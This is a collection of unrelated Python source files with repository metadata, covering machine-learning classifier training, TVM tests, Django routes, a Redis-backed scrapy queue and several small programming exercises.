def get_profile_and_soil_thickness(grid, data):
"""Calculate and return profiles of elevation and soil thickness.
"""
nc = grid.number_of_node_columns
elev = np.zeros(nc)
soil = np.zeros(nc)
for col in range(nc):
states = data[grid.nodes[:, col]]
(rows_with_rock_or_sed, ) = np.where(states > 0)
if len(rows_with_rock_or_sed) == 0:
elev[col] = 0.0
else:
elev[col] = np.amax(rows_with_rock_or_sed) + 0.5 * (col % 2)
soil[col] = np.count_nonzero(np.logical_and(states > 0, states < 8))
return elev, soil
def get_input_and_output_names(argv):
"""Parses names for input path, input file name, and output file.
Assumes that within the input path folder location there is a series of
folders that start with 'G', each containing an output grid."""
if len(argv) < 4:
out_name = DEFAULT_OUTPUT_NAME
else:
out_name = argv[3]
if len(argv) < 3:
in_name = DEFAULT_INPUT_NAME
else:
in_name = argv[2]
if len(argv) < 2:
in_path = DEFAULT_INPUT_PATH
else:
in_path = argv[1]
return in_path, in_name, out_name
def two_node_diff(a):
"""Calculate and return diffs over two nodes instead of one."""
N = len(a)
return a[2:] - a[:(N-2)]
def calc_mean_gradient(elev_profile):
"""Given elevation profile, calculates and returns mean gradient."""
N = len(elev_profile)
mean_grad_left = np.mean(two_node_diff(elev_profile[:((N+1)/2)])/1.73205)
mean_grad_right = np.mean(-two_node_diff(elev_profile[((N+1)/2):])/1.73205)
mean_grad = (mean_grad_left + mean_grad_right) / 2.0
return mean_grad
def process_model_output_data(in_path, in_name):
"""Iterate through output files and process, returning list of results."""
results_list = []
for item in os.listdir(in_path):
if item[0] == 'G':
# Read the Landlab grid and pull out the node_state field
g = load_grid(in_path + '/' + item + '/' + in_name)
ns = g.at_node['node_state']
# Get the elevation profile
(elev, soil) = get_profile_and_soil_thickness(g, ns)
# Calculate mean and max elevation
N = len(elev)
hmax = np.amax(elev[2:N-2])
hmean = np.average(elev[2:N-2])
# Get mean gradient
grad_mean = calc_mean_gradient(elev)
# Get the mean soil thickness and fractional soil cover
soil_mean = np.mean(soil)
(fs, nsurf, nsoil, nrock) = calc_fractional_soil_cover(g, ns)
run_number = item[17:]
run_number = run_number[:run_number.find('-')]
print(['run num ' + str(run_number) + ' ' + str(hmax)
+ ' ' + str(hmean) + ' ' + str(grad_mean) + ' '
+ str(soil_mean) + ' ' + str(fs) + ' ' + str(nsurf)
+ ' ' + str(nsoil) + ' ' + str(nrock)])
results_list.append((int(run_number), hmax, hmean, grad_mean,
soil_mean, fs, nsurf, nsoil, nrock))
results_list.sort()
return results_list
def write_output(results_list, out_name):
"""Write output to a file in csv format."""
outfile = open(out_name, 'w')
outfile.write('Run number,Max height,Mean height,Mean gradient,'
+ 'Mean soil thickness,Fractional soil cover,'
+ 'Total number of surface faces,'
+ 'Number of soil-air faces,'
+ 'Number of rock-air faces\n')
for item in results_list:
outstr = (str(item[0]) + ',' + str(item[1]) + ',' + str(item[2]) + ','
+ str(item[3]) + ',' + str(item[4]) + ',' + str(item[5])
+ ',' + str(item[6]) + ',' + str(item[7])
+ ',' + str(item[8]) + '\n')
outfile.write(outstr)
outfile.close()
def main():
"""Read, process, write, finish."""
(in_path, in_name, out_name) = get_input_and_output_names(sys.argv)
results_list = process_model_output_data(in_path, in_name)
write_output(results_list, out_name)
print('Processed ' + str(len(results_list)) + ' output files')
if __name__ == '__main__':
main()
|
[
"gtucker@colorado.edu"
] |
gtucker@colorado.edu
|
20a625ddaa72d4716cb4c286b72a4030d9773a0e
|
079731ed552f065c8f747ec068c2655d88ad3710
|
/run_classifier.py
|
d5ed740490f40eb60080e9e965c7ab004ee6c85a
|
[
"MIT"
] |
permissive
|
alyzleafbell/UER-py
|
5d402c023b92df5e3b6e379e8f2715f853e959e2
|
d33d9b2ee6f9324aacfbf06591bc63a11b1511b4
|
refs/heads/master
| 2023-01-20T04:16:48.010266
| 2020-12-02T09:41:01
| 2020-12-02T09:41:01
| null | 0
| 0
| null | null | null | null |
UTF-8
|
Python
| false
| false
| 16,950
|
py
|
"""
This script provides an exmaple to wrap UER-py for classification.
"""
import torch
import random
import argparse
import collections
import torch.nn as nn
from uer.utils.vocab import Vocab
from uer.utils.constants import *
from uer.utils.tokenizer import *
from uer.layers.embeddings import *
from uer.encoders.bert_encoder import *
from uer.encoders.rnn_encoder import *
from uer.encoders.birnn_encoder import *
from uer.encoders.cnn_encoder import *
from uer.encoders.attn_encoder import *
from uer.encoders.gpt_encoder import *
from uer.encoders.mixed_encoder import *
from uer.utils.optimizers import *
from uer.utils.config import load_hyperparam
from uer.utils.seed import set_seed
from uer.model_saver import save_model
class Classifier(nn.Module):
def __init__(self, args):
super(Classifier, self).__init__()
self.embedding = globals()[args.embedding.capitalize() + "Embedding"](args, len(args.tokenizer.vocab))
self.encoder = globals()[args.encoder.capitalize() + "Encoder"](args)
self.labels_num = args.labels_num
self.pooling = args.pooling
self.soft_targets = args.soft_targets
self.soft_alpha = args.soft_alpha
self.output_layer_1 = nn.Linear(args.hidden_size, args.hidden_size)
self.output_layer_2 = nn.Linear(args.hidden_size, self.labels_num)
def forward(self, src, tgt, seg, soft_tgt=None):
"""
Args:
src: [batch_size x seq_length]
tgt: [batch_size]
seg: [batch_size x seq_length]
"""
# Embedding.
emb = self.embedding(src, seg)
# Encoder.
output = self.encoder(emb, seg)
# Target.
if self.pooling == "mean":
output = torch.mean(output, dim=1)
elif self.pooling == "max":
output = torch.max(output, dim=1)[0]
elif self.pooling == "last":
output = output[:, -1, :]
else:
output = output[:, 0, :]
output = torch.tanh(self.output_layer_1(output))
logits = self.output_layer_2(output)
if tgt is not None:
if self.soft_targets and soft_tgt is not None:
loss = self.soft_alpha * nn.MSELoss()(logits, soft_tgt) + \
(1 - self.soft_alpha) * nn.NLLLoss()(nn.LogSoftmax(dim=-1)(logits), tgt.view(-1))
else:
loss = nn.NLLLoss()(nn.LogSoftmax(dim=-1)(logits), tgt.view(-1))
return loss, logits
else:
return None, logits
def count_labels_num(path):
labels_set, columns = set(), {}
with open(path, mode="r", encoding="utf-8") as f:
for line_id, line in enumerate(f):
if line_id == 0:
for i, column_name in enumerate(line.strip().split("\t")):
columns[column_name] = i
continue
line = line.strip().split("\t")
label = int(line[columns["label"]])
labels_set.add(label)
return len(labels_set)
def load_or_initialize_parameters(args, model):
if args.pretrained_model_path is not None:
# Initialize with pretrained model.
model.load_state_dict(torch.load(args.pretrained_model_path), strict=False)
else:
# Initialize with normal distribution.
for n, p in list(model.named_parameters()):
if 'gamma' not in n and 'beta' not in n:
p.data.normal_(0, 0.02)
def build_optimizer(args, model):
param_optimizer = list(model.named_parameters())
no_decay = ['bias', 'gamma', 'beta']
optimizer_grouped_parameters = [
{'params': [p for n, p in param_optimizer if not any(nd in n for nd in no_decay)], 'weight_decay_rate': 0.01},
{'params': [p for n, p in param_optimizer if any(nd in n for nd in no_decay)], 'weight_decay_rate': 0.0}
]
optimizer = AdamW(optimizer_grouped_parameters, lr=args.learning_rate, correct_bias=False)
scheduler = WarmupLinearSchedule(optimizer, warmup_steps=args.train_steps*args.warmup, t_total=args.train_steps)
return optimizer, scheduler
def batch_loader(batch_size, src, tgt, seg, soft_tgt=None):
instances_num = src.size()[0]
for i in range(instances_num // batch_size):
src_batch = src[i*batch_size: (i+1)*batch_size, :]
tgt_batch = tgt[i*batch_size: (i+1)*batch_size]
seg_batch = seg[i*batch_size: (i+1)*batch_size, :]
if soft_tgt is not None:
soft_tgt_batch = soft_tgt[i*batch_size: (i+1)*batch_size, :]
yield src_batch, tgt_batch, seg_batch, soft_tgt_batch
else:
yield src_batch, tgt_batch, seg_batch, None
if instances_num > instances_num // batch_size * batch_size:
src_batch = src[instances_num//batch_size*batch_size:, :]
tgt_batch = tgt[instances_num//batch_size*batch_size:]
seg_batch = seg[instances_num//batch_size*batch_size:, :]
if soft_tgt is not None:
soft_tgt_batch = soft_tgt[instances_num//batch_size*batch_size:, :]
yield src_batch, tgt_batch, seg_batch, soft_tgt_batch
else:
yield src_batch, tgt_batch, seg_batch, None
def read_dataset(args, path):
dataset, columns = [], {}
with open(path, mode="r", encoding="utf-8") as f:
for line_id, line in enumerate(f):
if line_id == 0:
for i, column_name in enumerate(line.strip().split("\t")):
columns[column_name] = i
continue
line = line[:-1].split('\t')
tgt = int(line[columns["label"]])
if args.soft_targets and "logits" in columns.keys():
soft_tgt = [float(value) for value in line[columns["logits"]].split(" ")]
if "text_b" not in columns: # Sentence classification.
text_a = line[columns["text_a"]]
src = args.tokenizer.convert_tokens_to_ids([CLS_TOKEN] + args.tokenizer.tokenize(text_a))
seg = [1] * len(src)
else: # Sentence-pair classification.
text_a, text_b = line[columns["text_a"]], line[columns["text_b"]]
src_a = args.tokenizer.convert_tokens_to_ids([CLS_TOKEN] + args.tokenizer.tokenize(text_a) + [SEP_TOKEN])
src_b = args.tokenizer.convert_tokens_to_ids(args.tokenizer.tokenize(text_b) + [SEP_TOKEN])
src = src_a + src_b
seg = [1] * len(src_a) + [2] * len(src_b)
if len(src) > args.seq_length:
src = src[:args.seq_length]
seg = seg[:args.seq_length]
while len(src) < args.seq_length:
src.append(0)
seg.append(0)
if args.soft_targets and "logits" in columns.keys():
dataset.append((src, tgt, seg, soft_tgt))
else:
dataset.append((src, tgt, seg))
return dataset
def train_model(args, model, optimizer, scheduler, src_batch, tgt_batch, seg_batch, soft_tgt_batch=None):
model.zero_grad()
src_batch = src_batch.to(args.device)
tgt_batch = tgt_batch.to(args.device)
seg_batch = seg_batch.to(args.device)
if soft_tgt_batch is not None:
soft_tgt_batch = soft_tgt_batch.to(args.device)
loss, _ = model(src_batch, tgt_batch, seg_batch, soft_tgt_batch)
if torch.cuda.device_count() > 1:
loss = torch.mean(loss)
if args.fp16:
with args.amp.scale_loss(loss, optimizer) as scaled_loss:
scaled_loss.backward()
else:
loss.backward()
optimizer.step()
scheduler.step()
return loss
def evaluate(args, dataset, print_confusion_matrix=False):
src = torch.LongTensor([sample[0] for sample in dataset])
tgt = torch.LongTensor([sample[1] for sample in dataset])
seg = torch.LongTensor([sample[2] for sample in dataset])
batch_size = args.batch_size
instances_num = src.size()[0]
correct = 0
# Confusion matrix.
confusion = torch.zeros(args.labels_num, args.labels_num, dtype=torch.long)
args.model.eval()
for i, (src_batch, tgt_batch, seg_batch, _) in enumerate(batch_loader(batch_size, src, tgt, seg)):
src_batch = src_batch.to(args.device)
tgt_batch = tgt_batch.to(args.device)
seg_batch = seg_batch.to(args.device)
with torch.no_grad():
loss, logits = args.model(src_batch, tgt_batch, seg_batch)
pred = torch.argmax(nn.Softmax(dim=1)(logits), dim=1)
gold = tgt_batch
for j in range(pred.size()[0]):
confusion[pred[j], gold[j]] += 1
correct += torch.sum(pred == gold).item()
if print_confusion_matrix:
print("Confusion matrix:")
print(confusion)
print("Report precision, recall, and f1:")
for i in range(confusion.size()[0]):
p = confusion[i,i].item()/confusion[i,:].sum().item()
r = confusion[i,i].item()/confusion[:,i].sum().item()
f1 = 2*p*r / (p+r)
print("Label {}: {:.3f}, {:.3f}, {:.3f}".format(i,p,r,f1))
print("Acc. (Correct/Total): {:.4f} ({}/{}) ".format(correct/len(dataset), correct, len(dataset)))
return correct/len(dataset), confusion
def main():
parser = argparse.ArgumentParser(formatter_class=argparse.ArgumentDefaultsHelpFormatter)
# Path options.
parser.add_argument("--pretrained_model_path", default=None, type=str,
help="Path of the pretrained model.")
parser.add_argument("--output_model_path", default="./models/classifier_model.bin", type=str,
help="Path of the output model.")
parser.add_argument("--vocab_path", default=None, type=str,
help="Path of the vocabulary file.")
parser.add_argument("--spm_model_path", default=None, type=str,
help="Path of the sentence piece model.")
parser.add_argument("--train_path", type=str, required=True,
help="Path of the trainset.")
parser.add_argument("--dev_path", type=str, required=True,
help="Path of the devset.")
parser.add_argument("--test_path", type=str,
help="Path of the testset.")
parser.add_argument("--config_path", default="./models/bert_base_config.json", type=str,
help="Path of the config file.")
# Model options.
parser.add_argument("--batch_size", type=int, default=64,
help="Batch size.")
parser.add_argument("--seq_length", type=int, default=128,
help="Sequence length.")
parser.add_argument("--embedding", choices=["bert", "word"], default="bert",
help="Emebdding type.")
parser.add_argument("--encoder", choices=["bert", "lstm", "gru", \
"cnn", "gatedcnn", "attn", "synt", \
"rcnn", "crnn", "gpt", "bilstm"], \
default="bert", help="Encoder type.")
parser.add_argument("--bidirectional", action="store_true", help="Specific to recurrent model.")
parser.add_argument("--pooling", choices=["mean", "max", "first", "last"], default="first",
help="Pooling type.")
parser.add_argument("--factorized_embedding_parameterization", action="store_true", help="Factorized embedding parameterization.")
parser.add_argument("--parameter_sharing", action="store_true", help="Parameter sharing.")
# Tokenizer options.
parser.add_argument("--tokenizer", choices=["bert", "char", "space"], default="bert",
help="Specify the tokenizer."
"Original Google BERT uses bert tokenizer on Chinese corpus."
"Char tokenizer segments sentences into characters."
"Space tokenizer segments sentences into words according to space."
)
# Optimizer options.
parser.add_argument("--soft_targets", action='store_true',
help="Train model with logits.")
parser.add_argument("--soft_alpha", type=float, default=0.5,
help="Weight of the soft targets loss.")
parser.add_argument("--learning_rate", type=float, default=2e-5,
help="Learning rate.")
parser.add_argument("--warmup", type=float, default=0.1,
help="Warm up value.")
parser.add_argument("--fp16", action='store_true',
help="Whether to use 16-bit (mixed) precision (through NVIDIA apex) instead of 32-bit.")
parser.add_argument("--fp16_opt_level", choices=["O0", "O1", "O2", "O3" ], default='O1',
help="For fp16: Apex AMP optimization level selected in ['O0', 'O1', 'O2', and 'O3']."
"See details at https://nvidia.github.io/apex/amp.html")
# Training options.
parser.add_argument("--dropout", type=float, default=0.5,
help="Dropout.")
parser.add_argument("--epochs_num", type=int, default=3,
help="Number of epochs.")
parser.add_argument("--report_steps", type=int, default=100,
help="Specific steps to print prompt.")
parser.add_argument("--seed", type=int, default=7,
help="Random seed.")
args = parser.parse_args()
# Load the hyperparameters from the config file.
args = load_hyperparam(args)
set_seed(args.seed)
# Count the number of labels.
args.labels_num = count_labels_num(args.train_path)
# Build tokenizer.
args.tokenizer = globals()[args.tokenizer.capitalize() + "Tokenizer"](args)
# Build classification model.
model = Classifier(args)
# Load or initialize parameters.
load_or_initialize_parameters(args, model)
args.device = torch.device("cuda" if torch.cuda.is_available() else "cpu")
model = model.to(args.device)
# Training phase.
trainset = read_dataset(args, args.train_path)
random.shuffle(trainset)
instances_num = len(trainset)
batch_size = args.batch_size
src = torch.LongTensor([example[0] for example in trainset])
tgt = torch.LongTensor([example[1] for example in trainset])
seg = torch.LongTensor([example[2] for example in trainset])
if args.soft_targets:
soft_tgt = torch.FloatTensor([example[3] for example in trainset])
else:
soft_tgt = None
args.train_steps = int(instances_num * args.epochs_num / batch_size) + 1
print("Batch size: ", batch_size)
print("The number of training instances:", instances_num)
optimizer, scheduler = build_optimizer(args, model)
if args.fp16:
try:
from apex import amp
except ImportError:
raise ImportError("Please install apex from https://www.github.com/nvidia/apex to use fp16 training.")
model, optimizer = amp.initialize(model, optimizer, opt_level = args.fp16_opt_level)
args.amp = amp
if torch.cuda.device_count() > 1:
print("{} GPUs are available. Let's use them.".format(torch.cuda.device_count()))
model = torch.nn.DataParallel(model)
args.model = model
total_loss, result, best_result = 0., 0., 0.
print("Start training.")
for epoch in range(1, args.epochs_num+1):
model.train()
for i, (src_batch, tgt_batch, seg_batch, soft_tgt_batch) in enumerate(batch_loader(batch_size, src, tgt, seg, soft_tgt)):
loss = train_model(args, model, optimizer, scheduler, src_batch, tgt_batch, seg_batch, soft_tgt_batch)
total_loss += loss.item()
if (i + 1) % args.report_steps == 0:
print("Epoch id: {}, Training steps: {}, Avg loss: {:.3f}".format(epoch, i+1, total_loss / args.report_steps))
total_loss = 0.
result = evaluate(args, read_dataset(args, args.dev_path))
if result[0] > best_result:
best_result = result[0]
save_model(model, args.output_model_path)
# Evaluation phase.
if args.test_path is not None:
print("Test set evaluation.")
if torch.cuda.device_count() > 1:
model.module.load_state_dict(torch.load(args.output_model_path))
else:
model.load_state_dict(torch.load(args.output_model_path))
evaluate(args, read_dataset(args, args.test_path), True)
if __name__ == "__main__":
main()
|
[
"1152543959@qq.com"
] |
1152543959@qq.com
|
e318067d8d92753c1ff55de7175dfdf9541e70e6
|
a1a518ba04855820f531c705c36028e4d7435a86
|
/tests/python/driver/tvmc/test_registry_options.py
|
458d0a88d1f727c407015444d34fe709309c781b
|
[
"Apache-2.0",
"BSD-3-Clause",
"Zlib",
"MIT",
"LicenseRef-scancode-unknown-license-reference",
"Unlicense",
"BSD-2-Clause"
] |
permissive
|
ZQPei/tvm
|
b47f7a3f16400774eefb5ca882a0053e46176a52
|
6c32f976522aa1d923fcfe364f05a7860cb346b4
|
refs/heads/main
| 2021-12-10T22:33:44.248391
| 2021-11-30T23:58:05
| 2021-11-30T23:58:05
| 203,511,290
| 0
| 1
|
Apache-2.0
| 2021-11-25T09:28:32
| 2019-08-21T05:17:34
|
Python
|
UTF-8
|
Python
| false
| false
| 2,911
|
py
|
# Licensed to the Apache Software Foundation (ASF) under one
# or more contributor license agreements. See the NOTICE file
# distributed with this work for additional information
# regarding copyright ownership. The ASF licenses this file
# to you under the Apache License, Version 2.0 (the
# "License"); you may not use this file except in compliance
# with the License. You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing,
# software distributed under the License is distributed on an
# "AS IS" BASIS, WITHOUT WARRANTIES OR CONDITIONS OF ANY
# KIND, either express or implied. See the License for the
# specific language governing permissions and limitations
# under the License.
import argparse
import pytest
from tvm.driver.tvmc.common import TVMCException
from tvm.driver.tvmc.registry import generate_registry_args, reconstruct_registry_entity
from tvm.relay.backend import Executor
def test_registry_to_argparse():
parser = argparse.ArgumentParser()
generate_registry_args(parser, Executor)
parsed, _ = parser.parse_known_args(["--executor=aot", "--executor-aot-interface-api=c"])
assert parsed.executor == "aot"
assert parsed.executor_aot_interface_api == "c"
def test_registry_to_argparse_default():
parser = argparse.ArgumentParser()
generate_registry_args(parser, Executor, "aot")
parsed, _ = parser.parse_known_args([])
assert parsed.executor == "aot"
def test_mapping_registered_args():
parser = argparse.ArgumentParser()
generate_registry_args(parser, Executor)
parsed, _ = parser.parse_known_args(["--executor=aot", "--executor-aot-interface-api=c"])
entity = reconstruct_registry_entity(parsed, Executor)
assert isinstance(entity, Executor)
assert "interface-api" in entity
assert entity["interface-api"] == "c"
def test_mapping_registered_args_no_match_for_name():
parser = argparse.ArgumentParser()
generate_registry_args(parser, Executor)
parsed, _ = parser.parse_known_args(["--executor=woof"])
with pytest.raises(TVMCException, match='Executor "woof" is not defined'):
reconstruct_registry_entity(parsed, Executor)
def test_mapping_registered_args_no_arg():
parser = argparse.ArgumentParser()
generate_registry_args(parser, Executor)
parsed, _ = parser.parse_known_args([])
assert reconstruct_registry_entity(parsed, Executor) == None
def test_mapping_registered_args_mismatch_for_arg():
parser = argparse.ArgumentParser()
generate_registry_args(parser, Executor)
parsed, _ = parser.parse_known_args(["--executor=aot", "--executor-graph-link-params=1"])
with pytest.raises(
TVMCException,
match="Passed --executor-graph-link-params but did not specify graph executor",
):
reconstruct_registry_entity(parsed, Executor)
|
[
"noreply@github.com"
] |
ZQPei.noreply@github.com
|
153e2afd35e596d691f24b7f0b289bd2cfa4307c
|
449b2889900cf2ec285ae2309d07fac31f286234
|
/sms/urls.py
|
d90f7027541f609b2332719cb12c53b3b73508ed
|
[
"MIT"
] |
permissive
|
xchoudhury/twilio_app
|
05b3ed8e58b14b5ea95997e8e0315738d5b07aac
|
c06ae7dc27f46d9a0af78b3f1fc9dc8a51cf81f7
|
refs/heads/master
| 2022-12-13T03:52:54.335870
| 2017-06-28T02:43:46
| 2017-06-28T02:43:46
| 95,335,969
| 0
| 0
| null | 2022-12-07T23:57:40
| 2017-06-25T03:21:14
|
Python
|
UTF-8
|
Python
| false
| false
| 280
|
py
|
from django.conf.urls import url
from . import views
urlpatterns = [
url(
r'^sms/send/$',
views.send_sms,
name='send_sms'
),
url(
r'^sms/receive/$',
views.receive_sms,
name='receive_sms'
),
]
|
[
"xchoudhury@gmail.com"
] |
xchoudhury@gmail.com
|
f148e707e28d61acb86229973a9fea7274e78d5c
|
b47e307ebb4b76d4cb15feab2d952df037abf6b5
|
/pyexercises/b_019.py
|
ba350e14ae5f28c9ca4cb73bd53fabd49762c27a
|
[] |
no_license
|
wiccawill420/pybites
|
50964bb102600c02a2ccd5bf8aab2069a14db0c8
|
59c87c36d6daf016057b8890724267df1a7e41d6
|
refs/heads/master
| 2022-11-27T20:21:06.089961
| 2020-07-31T20:03:23
| 2020-07-31T20:03:23
| 283,005,585
| 0
| 0
| null | null | null | null |
UTF-8
|
Python
| false
| false
| 849
|
py
|
from datetime import datetime, timedelta
import inspect
NOW = datetime.now()
class Promo:
def __init__(self, name, expires):
self.name = name
self.expires = expires
@property
def expired(self):
if self.expires < NOW:
return True
else:
return False
def test_promo_expired():
past_time = NOW - timedelta(seconds=3)
twitter_promo = Promo('twitter', past_time)
assert twitter_promo.expired
def test_promo_not_expired():
future_date = NOW + timedelta(days=1)
newsletter_promo = Promo('newsletter', future_date)
# print(newsletter_promo.__dict__)
# print(newsletter_promo.expired())
assert not newsletter_promo.expired
def test_uses_property():
assert 'property' in inspect.getsource(Promo)
# test_promo_not_expired()
test_uses_property()
|
[
"william.lynn.1337@gmail.com"
] |
william.lynn.1337@gmail.com
|
5824a5d8555db04a2932bb992498a6649742e9e3
|
2169c394afe2c00a3d593433925083daa15e504e
|
/lesson5/zd5_3.py
|
92ee543bbb4e84a24f07471c336dd53ddec733ed
|
[] |
no_license
|
Lexa07/Lesson
|
89bc464ed6ee07661eec7c08e11dfdb80c56a1bc
|
0357002ea0a76eb46149de68d7c33b61b7a9d6d4
|
refs/heads/lesson1
| 2023-03-10T09:22:06.280934
| 2021-02-13T10:38:42
| 2021-02-13T10:38:42
| 330,971,623
| 0
| 0
| null | null | null | null |
UTF-8
|
Python
| false
| false
| 1,068
|
py
|
"""
3. Создать текстовый файл (не программно), построчно записать фамилии
сотрудников и величину их окладов. Определить, кто из сотрудников
имеет оклад менее 20 тыс., вывести фамилии этих сотрудников.
Выполнить подсчет средней величины дохода сотрудников.
"""
from functools import reduce
def func_my(el_1, el_2):
return float(el_1) + float(el_2)
with open("text_3.txt", "r") as mytext:
my_list = []
zp = 20000 # вывел чтобы легче было менять ориентир по зарплате
for line in mytext:
worker = line.split(' ')
my_list.append(worker[1])
if float(worker[1]) < zp:
print(worker[0])
i = len(my_list)
mnog = reduce(func_my, my_list)
print(f"Средняя заработная плата сотрудников: {mnog / i} рублей.")
|
[
"latyw07@mail.ru"
] |
latyw07@mail.ru
|
7dd1c492f62f77a8e944c442208db313fcff19a4
|
3f5f52b37f7aca332c5cbca0a06ff33685f20c5b
|
/sf_record_spider/distribute_util/request_queue.py
|
5d85e435d1193babf6995725a6c3e80efdb81713
|
[] |
no_license
|
lxs137/py_house_spider
|
197a9f3353bbf640dfae07c14e2ad914d6a4801f
|
9a39aa78628c7ffb39647d301e94f6a2d4bbbd17
|
refs/heads/master
| 2021-01-11T15:37:24.984631
| 2017-12-22T01:13:46
| 2017-12-22T01:13:46
| 79,902,824
| 4
| 2
| null | 2017-07-24T05:18:36
| 2017-01-24T10:50:30
|
Python
|
UTF-8
|
Python
| false
| false
| 1,411
|
py
|
from scrapy.utils.reqser import request_from_dict, request_to_dict
import pickle
from redis import Redis
class RedisRequestQueue(object):
def __init__(self, server, spider, queue_key):
self.server = server
self.spider = spider
self.key = queue_key
def _decode_request(self, request_data):
return request_from_dict(pickle.loads(request_data), self.spider)
def _encode_request(self, request):
# protocol为负数代表使用HIGEST_PROTOCOL
return pickle.dumps(request_to_dict(request, self.spider), protocol=-1)
def __len__(self):
return self.server.zcard(self.key)
def close(self, reason):
self.server.delete(self.key)
def pop(self):
pipe = self.server.pipeline()
# 保证接下来的操作作为一个事务进行执行
pipe.multi()
pipe.zrange(self.key, 0, 0)
pipe.zremrangebyrank(self.key, 0, 0)
value, count = pipe.execute()
if value:
return self._decode_request(value[0])
def push(self, request):
request_data = self._encode_request(request)
# 对request来说,priority越大优先级越高,
# 但对于redis的有序集合来说,默认情况下:score分数越低优先级越高
# 因此将request.priority取负数作为member的score
self.server.zadd(self.key, request_data, -request.priority)
|
[
"lxs137@hotmail.com"
] |
lxs137@hotmail.com
|
f5534aa8a51ae46e08d79ac732c13842a87749aa
|
0653d222b1679fd3d3616c6f6f34804f465d2b56
|
/tests/test_ls_algo.py
|
fb6f4e3b3cd4d2839a809556b88162ceb38d5033
|
[] |
no_license
|
DaddyTrap/SocketRouter
|
e310b6798184f75a24fbd9c59767b4ad9e7a4f69
|
d0b2ad314e2b485eba752f0809267c991f4c9432
|
refs/heads/master
| 2021-09-01T18:40:40.043678
| 2017-12-28T08:33:35
| 2017-12-28T08:33:35
| 112,981,718
| 0
| 0
| null | null | null | null |
UTF-8
|
Python
| false
| false
| 401
|
py
|
import route_node.route_node as route_node
forward_table = {}
topo = {
1: {
1: 0,
3: 20,
4: 10
},
3: {
1: 20,
4: 5,
5: 5
},
4: {
1: 10,
3: 5,
5: 5
},
5: {
3: 5,
4: 5
}
}
ret = route_node.LSRouteNode.ls_algo(1, topo, forward_table)
print(forward_table)
|
[
"914670787@qq.com"
] |
914670787@qq.com
|
2f9655fa112df5ca5906905afbc0c4fbf062d7d9
|
51d0377511a5da902033fb9d80184db0e096fe2c
|
/05-importing-data-in-python-1/2-importing-data-from-other-files-types/04-customizing-your-spreadsheet-import.py
|
d70b70184020466e1f5cc0e4109a2a15e2713f58
|
[] |
no_license
|
sashakrasnov/datacamp
|
c28c6bda178163337baed646220b2f7dcc36047d
|
759f4cec297883907e21118f24a3449d84c80761
|
refs/heads/master
| 2021-12-07T02:54:51.190672
| 2021-09-17T21:05:29
| 2021-09-17T21:05:29
| 157,093,632
| 6
| 5
| null | null | null | null |
UTF-8
|
Python
| false
| false
| 1,619
|
py
|
'''
Customizing your spreadsheet import
Here, you'll parse your spreadsheets and use additional arguments to skip rows, rename columns and select only particular columns.
The spreadsheet 'battledeath.xlsx' is already loaded as xl.
As before, you'll use the method parse(). This time, however, you'll add the additional arguments skiprows, names and parse_cols. These skip rows, name the columns and designate which columns to parse, respectively. All these arguments can be assigned to lists containing the specific row numbers, strings and column numbers, as appropriate.
Instructions
* Parse the first sheet by index. In doing so, skip the first row of data and name the columns 'Country' and 'AAM due to War (2002)' using the argument names. The values passed to skiprows and names all need to be of type list.
* Parse the second sheet by index. In doing so, parse only the first column with the parse_cols parameter, skip the first row and rename the column 'Country'. The argument passed to parse_cols also needs to be of type list.
'''
# Import pandas
import pandas as pd
# Assign spreadsheet filename: file
file = '../datasets/battledeath.xlsx'
# Load spreadsheet: xl
xl = pd.ExcelFile(file)
# Parse the first sheet and rename the columns: df1
df1 = xl.parse(0, skiprows=[0], names=['Country', 'AAM due to War (2002)'])
# Print the head of the DataFrame df1
print(df1.head())
# Parse the first column of the second sheet and rename the column: df2
df2 = xl.parse(0, parse_cols=[0], skiprows=[0], names=['Country', 'AAM due to War (2004)'])
# Print the head of the DataFrame df2
print(df2.head())
|
[
"a@skrasnov.com"
] |
a@skrasnov.com
|
2078df2066e4dc94d84e50fde4a6a7c9bae43fd2
|
82b728e805d887102c0b8c415731b353877690cd
|
/samples/generated_samples/aiplatform_generated_aiplatform_v1_metadata_service_purge_artifacts_async.py
|
be1cc40f02347804f3d7ccef30143cd4d9744042
|
[
"Apache-2.0"
] |
permissive
|
geraint0923/python-aiplatform
|
90c7742c9bdbde05b9688b117e8e59c0406d6f85
|
7ab05d5e127636d96365b7ea408974ccd6c2f0fe
|
refs/heads/main
| 2023-08-24T05:30:38.519239
| 2021-10-27T20:38:25
| 2021-10-27T20:38:25
| 370,803,114
| 0
| 0
|
Apache-2.0
| 2021-05-25T19:15:47
| 2021-05-25T19:15:46
| null |
UTF-8
|
Python
| false
| false
| 1,725
|
py
|
# -*- coding: utf-8 -*-
# Copyright 2020 Google LLC
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
#
# Generated code. DO NOT EDIT!
#
# Snippet for PurgeArtifacts
# NOTE: This snippet has been automatically generated for illustrative purposes only.
# It may require modifications to work in your environment.
# To install the latest published package dependency, execute the following:
# python3 -m pip install google-cloud-aiplatform
# [START aiplatform_generated_aiplatform_v1_MetadataService_PurgeArtifacts_async]
from google.cloud import aiplatform_v1
async def sample_purge_artifacts():
"""Snippet for purge_artifacts"""
# Create a client
client = aiplatform_v1.MetadataServiceAsyncClient()
# Initialize request argument(s)
request = aiplatform_v1.PurgeArtifactsRequest(
parent="projects/{project}/locations/{location}/metadataStores/{metadata_store}/artifacts/{artifact}",
filter="filter_value",
)
# Make the request
operation = client.purge_artifacts(request=request)
print("Waiting for operation to complete...")
response = await operation.result()
print(response)
# [END aiplatform_generated_aiplatform_v1_MetadataService_PurgeArtifacts_async]
|
[
"noreply@github.com"
] |
geraint0923.noreply@github.com
|
caa7b6c37ddc4abe6bd02420da52258d8a58eddd
|
1f1a1e9b595cbd1dfcba4435658eab3bbbcbda82
|
/core/settings.py
|
187d7ce051ffb03d1dc011156722ff499b82deea
|
[] |
no_license
|
Juju-And/twitter
|
b910f222e965f342d173bb7c163f6ab469473edc
|
325530bf0dd35c799ff945930bdfb32f4e03429c
|
refs/heads/master
| 2020-09-15T23:03:16.400640
| 2019-11-23T17:01:28
| 2019-11-23T17:01:28
| 223,578,191
| 0
| 0
| null | null | null | null |
UTF-8
|
Python
| false
